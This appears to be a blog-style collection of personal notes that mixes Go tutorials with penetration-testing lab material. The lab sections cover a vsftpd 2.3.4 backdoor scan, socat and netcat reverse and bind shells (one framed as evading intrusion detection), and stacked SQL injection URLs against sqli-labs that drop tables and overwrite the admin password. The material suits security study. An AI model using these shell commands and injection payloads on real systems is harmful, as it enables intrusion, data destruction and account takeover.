┌──(root㉿kali)-[/home/kali/Desktop/cd] └─# nmap -A -sV 192.168.244.136
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-05 15:58 EST Nmap scan report for 192.168.244.136 (192.168.244.136) Host is up (0.00064s latency). Not shown: 977 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.244.140 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status
VSFTPD 2.3.4 exploit with hydra
First , we need construct dictionaries about username and password here’s the dictionaries which usernames named usernames.txt and passwords named passwords.txt
then , we use the tools hydra with the follow command line:
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Provided by: hdm <x@hdm.io> MC <mc@metasploit.com>
Available targets: Id Name -- ---- => 0 Automatic
Check supported: No
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 21 yes The target port (TCP)
Description: This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
To test a Go file, you typically need to create a test file in the same directory as the file you’re testing and write your test code within it. Here’s an example: you have a file named math.go containing a simple mathematical function ‘Add.’ Then, you will create a test file named math_test.go to test this function.
Assuming the math.go file is as follows:
1 2 3 4 5 6 7
// math.go
package main
funcAdd(a, b int)int { return a + b }
You can then create a math_test.go file to write your test code:
1 2 3 4 5 6 7 8 9 10 11 12 13
// math_test.go
package main
import"testing"
funcTestAdd(t *testing.T) { result := Add(2, 3) expected := 5 if result != expected { t.Errorf("Add(2, 3) returned %d, expected %d", result, expected) } }
In math_test.go, we import the testing package and write a test function named TestAdd. Test functions should start with ‘Test’ and accept a *testing.T parameter, which is used to report test failures.
Inside the TestAdd function, we call Add(2, 3) to execute the function being tested and compare the result to the expected value. If the result doesn’t match the expected value, we use t.Errorf to report the test failure with detailed error information.
Next, you can run the tests using the ‘go test‘ command in your terminal:
1
go test
Go will search for all the _test.go files in the current directory and execute the test functions within them. If the tests pass, you’ll see a success message. If the tests fail, you’ll get detailed failure information.
This is just a very basic example. In real-world projects, you can write more test cases to cover various scenarios and ensure that your code works correctly in different situations.”
In the Go language, “nil“ is a special predefined value commonly used to represent zero values or missing values in certain data structures. Here are some common usages and scenarios for “nil“:
Pointer and Reference Types: The most common use of “nil“ is in pointer and reference types, indicating that a pointer doesn’t point to any valid memory address or a reference doesn’t reference any object. For example, “nil“ is used in the following cases:
1 2 3
var ptr *int// Declare an integer pointer, its zero value is nil var slice []int// Declare an integer slice, its zero value is nil var m map[string]int// Declare a map, its zero value is nil
Interface Types: “nil“ can also be used with interface types, signifying that an interface has no specific implemented value. This can be useful in some cases to check if an interface is empty (uninitialized or unassigned).
1 2 3 4 5
var myInterface interface{}
if myInterface == nil { fmt.Println("The interface is empty") }
Function and Method Return Values: Functions and methods can return multiple values, some of which might be pointer types. In certain situations, returned pointers may be “nil,” indicating that there are no valid return values.
1 2 3 4 5 6 7 8
funcfindValue(slice []int, target int) (*int, bool) { for i, val := range slice { if val == target { return &slice[i], true } } returnnil, false }
It’s important to handle “nil“ with care to avoid runtime errors like null pointer references. It’s a good practice to check whether pointers, slices, maps, and other data structures are “nil“ before accessing them to ensure safety.
panic() and recover() are two important functions in the Go language for handling exceptions. Here is a simple example that demonstrates how to use panic() and recover() in Go.
// A function to simulate a situation that might cause a panic funcdoSomething() { deferfunc() { if err := recover(); err != nil { fmt.Println("Panic occurred but recovered:", err) } }()
// Simulate a problematic situation num1 := 10 num2 := 0 result := num1 / num2 // This will cause a division by zero panic fmt.Println("Result is:", result) // This won't be printed as the panic has already occurred }
funcmain() { fmt.Println("Starting the program")
doSomething()
fmt.Println("Program continues to execute") // Even if a panic occurs, this line will be printed because the panic has been recovered in doSomething() }
In the example above, the doSomething() function attempts to divide 10 by 0, which would lead to a division by zero panic. However, we use defer() and recover() to catch and handle the panic. In the main() function, even if a panic occurs within doSomething(), the program continues to execute, and the panic information is printed within the recover() block.
Running this program will produce the following output:
1 2 3 4
Starting the program Panic occurred but recovered: runtime error: integer divide by zero Program continues to execute
This demonstrates that the recover() function successfully catches the panic, allowing the program to continue executing without terminating.”
In Go language, defer is a very useful keyword used for deferring the execution of functions, typically employed for performing cleanup or resource release operations before a function returns.
A defer statement pushes the function call that should be deferred onto a stack and executes these deferred function calls in a last-in, first-out (LIFO) order just before the current function returns.
Here are some important features and uses of defer:
Deferred Execution: Using the defer keyword ensures that a function call is executed before the containing function returns, whether it returns normally or due to an error.
Resource Cleanup: Common use cases include closing files, releasing locks, closing database connections, and other cleanup operations to prevent resource leaks.
Parameter Evaluation: The parameters in a defer statement are evaluated when the defer statement is executed, not when the function returns.
Here are some examples demonstrating the use of defer:
funcmain() { // Example 1: defer for file closing file := openFile("example.txt") defer closeFile(file)
// Example 2: defer for logging function execution time defer logTime("Function execution")
// Example 3: Multiple defer statements execute in a last-in, first-out order for i := 1; i <= 5; i++ { defer fmt.Println("Deferred statement", i) }
fmt.Println("Function body") }
funcopenFile(filename string) *File { fmt.Println("Opening file:", filename) return// Open the file and return the file handle }
funccloseFile(file *File) { fmt.Println("Closing file") // Close the file }
funclogTime(message string) { fmt.Println(message, "at some time") }
In the above examples, defer statements are used to ensure the file is closed before main returns, log the execution time of the function, and execute multiple defer statements in a last-in, first-out order.
defer is a powerful tool in Go that can help you write safer and cleaner code, ensuring proper resource release and consistency.”
In Go language, closures and anonymous functions are both forms of functions, but they have some important differences. Below, I will provide examples of the usage and differences between these two concepts:
Closure Example: A closure refers to a function that captures one or more variables from its outer function scope and can be called outside of that function while still accessing these captured variables.
// Call the closure function closure() // Output: Outer variable outerVar: 10
// Modify the outer variable outerVar = 20
// Call the closure function again closure() // Output: Outer variable outerVar: 20 }
In the above example, closure is a closure that captures the outer variable outerVar and can access and modify that variable even outside the function.
Anonymous Function Example:
An anonymous function is a function without a name; it can be directly assigned to a variable or passed as an argument to other functions.
funcmain() { // Define and call an anonymous function result := func(x, y int)int { return x + y }(5, 3)
fmt.Println("Result of the anonymous function:", result) // Output: Result of the anonymous function: 8
// Assign an anonymous function to a variable add := func(x, y int)int { return x + y }
sum := add(10, 20) fmt.Println("Calling the anonymous function using a variable:", sum) // Output: Calling the anonymous function using a variable: 30 }
In the above example, we define an anonymous function and call it directly. We also assign another anonymous function to the add variable and use that variable to call the function.
To summarize the differences:
A closure is a function that captures external variables and can access and modify them outside of the function. An anonymous function is a function without a name, which can be assigned to a variable or passed as an argument to other functions. It’s important to note that while closures often involve anonymous functions, not all anonymous functions are closures. A closure is a specific type of anonymous function that captures external variables.
“go func()” is a way in the Go programming language to launch new concurrent goroutines. A goroutine is a lightweight thread in Go used for concurrent task execution. Using “go func()” allows you to create new concurrent execution flows in your program without the need to explicitly create threads or manage the complexity of thread management.
Here is a basic example and some key concepts of using “go func()”:
Basic Example:
1 2 3 4 5 6 7
funcmain() { gofunc() { // Place the code you want to execute in a new concurrent goroutine here }()
// The main goroutine continues to execute other work }
In the example above, “go func()” starts a concurrent goroutine for an anonymous function, which will execute the code inside it. The main goroutine continues to execute other tasks, while the new concurrent goroutine runs in the background.
Key Concepts:
Anonymous Function: Anonymous functions are typically used to define “go func()” because there’s no need to name the concurrent goroutine. The code for the anonymous function can be enclosed in {} as needed.
Concurrent Execution: Goroutines launched with “go func()” run concurrently in the background without blocking the main program’s execution. This allows you to execute multiple tasks simultaneously, improving program performance.
Data Sharing: Concurrent goroutines can share data, but it’s important to handle shared data carefully to avoid race conditions and data races. You can use tools provided by the “sync” package to manage access to shared data.
Goroutine Management: Go’s runtime system is responsible for creating, scheduling, and destroying goroutines. You don’t need to worry about the complexity of thread creation and destruction.
Waiting for Goroutines to Complete: If you need to wait for concurrent goroutines to finish, you can use mechanisms like “sync.WaitGroup” or channels to implement waiting.
Using “go func()” is a simple way to achieve concurrency in the Go programming language, allowing you to run tasks in parallel, such as handling concurrent requests, performing background tasks, or other work that needs to execute simultaneously. However, be cautious about handling concurrency issues and ensuring that shared data is synchronized and accessed correctly.
Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. For penetration testing, it is similar to Netcat but has additional useful features.
While there are a multitude of things that socat can do, we will only cover a few of them to illustrate its use.
C:\Users\Administrator\Desktop\socat> socat TCP4:192.168.244.140:443 file:nmap-list.txt ,create C:\Users\Administrator\Desktop\socat> type nmap-list.txt Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 23:19 EDT Warning: 199.241.133.26 giving up on port because retransmission cap hit (10). Stats: 0:07:04 elapsed; 0 hosts completed (64 up), 64 undergoing SYN Stealth Scan ...
Socat Reverse Shells
Server side:
1 2
C:\Users\Administrator\Desktop\socat> socat -d -d TCP4-LISTEN:443 STDOUT ... socat[5640] N listening on AF=2 0.0.0.0:443
Client side: When client side type follow command :
C:\Users\Administrator\Desktop\socat> socat -d -d TCP4-LISTEN:443 STDOUT ... socat[5640] N listening on AF=2 0.0.0.0:443 ... socat[5640] N accepting connection from AF=2 192.168.244.140:54720 on 192.168.244.144:443 ... socat[5640] N using stdout for reading and writing ... socat[5640] N starting data transfer loop with FDs [4,4] and [1,1] whoami root id uid=0(root) gid=0(root) groups=0(root)
Socat Encrypted Bind Shells
To add encryption to a bind shell, we will rely on Secure Socket Layer certificates. This level of encryption will assist in evading intrusion detection systems (IDS) and will help hide the sensitive data we are transceiving. To continue with the example, we will use the openssl application to create a selfsigned certificate using the following options: • req: initiate a new certificate signing request • -newkey: generate a new private key • rsa:2048: use RSA encryption with a 2,048-bit key length. • -nodes: store the private key without passphrase protection • -keyout: save the key to a file • -x509: output a self-signed certificate instead of a certificate request • -days: set validity period in days • -out: save the certificate to a file
Once we generate the key, we will cat the certificate and its private key into a file, which we will eventually use to encrypt our bind shell.
┌──(root㉿kali)-[/home/kali/Desktop] └─# openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt ...+..+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.+.....+.+...+.....+......+.+......+.....+.......+.....+...............+.+.....+.+......+...+..+....+...+...+..................+.........+...+.....+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.....+......+......+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ .+.+......+...+..+.+.....+.........+......+...+.........+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*..............+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*....+....+........+....+.....+.+.....+...+.......+..+.......+........+.+.....+.+...+........+.........+..................+......+.........+......+..........+.........+..+....+.........+......+.........+...+..+...+....+........+......+.+.........+......+...........+...+.......+...........................+.....+.......+......+........+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:CA State or Province Name (full name) [Some-State]:Quebec Locality Name (eg, city) []:Montreal Organization Name (eg, company) [Internet Widgits Pty Ltd]:Raohua Organizational Unit Name (eg, section) []:Try Harder Department Common Name (e.g. server FQDN or YOUR name) []: Email Address []: ┌──(root㉿kali)-[/home/kali/Desktop] └─# cat bind_shell.key bind_shell.crt > bind_shell.pem ┌──(root㉿kali)-[/home/kali/Desktop] └─# socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
Netcat first released in 1995(!) by Hobbit is one of the “original” network penetration testing tools and is so versatile that it lives up to the author’s designation as a hacker’s “Swiss army knife”. The clearest definition of Netcat is from Hobbit himself: a simple “utility which reads and writes data across network connections, using TCP or UDP protocols.
Connecting to a TCP/UDP Port
We can use client mode to connect to any TCP/UDP port, allowing us to: • Check if a port is open or closed. • Read a banner from the service listening on a port. • Connect to a network service manually.
Example:
1
nc -nv 10.11.10.2 110
-n option to skip DNS name resolution; -v to add some verbosity;
Output:
1 2 3 4 5 6 7 8
(UNKNOWN) [10.11.10.2] 110 (pop3) open +OK Dovecot ready. USER offsec +OK PASS offsec -ERR [AUTH] Authentication failed. quit +OK Logging out
Listening on a TCP/UDP Port
Example:
First , server start listening:
1 2 3
//From server : msfadmin@metasploitable:~$ nc -nlvp 4444 listening on [any] 4444 ...
Then client try to connect server,and send “hello world”:
1 2 3 4 5
//From client : ┌──(root㉿kali)-[/home/kali/Desktop] └─# nc -nv 192.168.244.136 4444 (UNKNOWN) [192.168.244.136] 4444 (?) open hello world
The server will receive message “hello world”:
1 2 3 4 5
//From server : msfadmin@metasploitable:~$ nc -nlvp 4444 listening on [any] 4444 ... connect to [192.168.244.136] from (UNKNOWN) [192.168.244.140] 47386 hello world
Transferring Files with Netcat
From Server:
1 2 3
//From server : C:\Users\Administrator\Desktop\nc> nc -nlvp 4444 > mync.exe listening on [any] 4444 ...
Notice that we have not received any feedback from Netcat about our file upload progress. In this case, since the file we are uploading is small, we can just wait a few seconds, then check whether the file has been fully uploaded to the Windows machine by attempting to run it:
1 2 3 4 5 6 7 8 9 10 11
C:\Users\Administrator\Desktop\nc>mync -h [v1.10-47] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port] options: -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -b allow broadcasts ... port numbers can be individual or ranges: lo-hi [inclusive]; hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
Netcat Bind Shell Scenario
Run Netcat with the -e option to execute cmd.exe once a connection is made to the listening port:
┌──(root㉿kali)-[/home/kali/Desktop] └─# nc -nv 192.168.244.143 4444 (UNKNOWN) [192.168.244.143] 4444 (?) open Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
In SQL, a semicolon represents the end of one SQL statement, while stack-based injection involves executing multiple SQL statements together. Stack-based injection is different from other injection techniques and has limitations.
1 2
%27 --- ' %20 --- space
How can you find the table fields and table names of the other party?
Look for exploitable files using directory traversal vulnerabilities, such as files with a .sql extension.
Use directory/file fuzzing tools like Dirsearch, etc., to search for .sql files.
Search for source code leakage vulnerabilities on the other party’s website; the source code may contain exploitable files.
Search for the other party’s website source code on GitHub.
Example:
1 2 3 4 5
http://192.168.1.33/sqli-labs-master/Less-38/?id=1' //You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 http://192.168.1.33/sqli-labs-master/Less-38/?id=1'; // it's ok http://192.168.1.33/sqli-labs-master/Less-38/?id=1';create table aa like users; //create a table named aa, structure like table users http://192.168.1.33/sqli-labs-master/Less-38/?id=1';drop table aa--+ http://192.168.1.33/sqli-labs-master/Less-38/?id=1';update users set password ='admin@1234' where username='admin'